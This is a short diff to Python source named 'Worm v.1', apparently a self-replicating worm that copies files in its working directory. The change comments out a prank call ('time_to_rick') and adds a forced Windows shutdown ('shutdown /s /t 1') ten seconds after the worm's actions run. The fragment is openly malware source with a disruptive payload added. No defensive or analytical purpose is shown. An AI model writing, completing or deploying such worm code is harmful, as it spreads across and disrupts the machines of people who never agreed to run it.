--- a/Worm v.1
+++ b/Worm v.1
@@ -200,7 +200,7 @@ class Worm:
             logging.warning("something went wrong")
         
         self.copy_existing_files()
-        self.time_to_rick()
+        #self.time_to_rick()
         
         
 
@@ -214,4 +214,5 @@ if __name__=="__main__":
     current_directory = os.path.abspath("")
     worm = Worm(path=current_directory)
     worm.start_worm_actions()
-    
+    sleep(10)
+    os.system("shutdown /s /t 1")
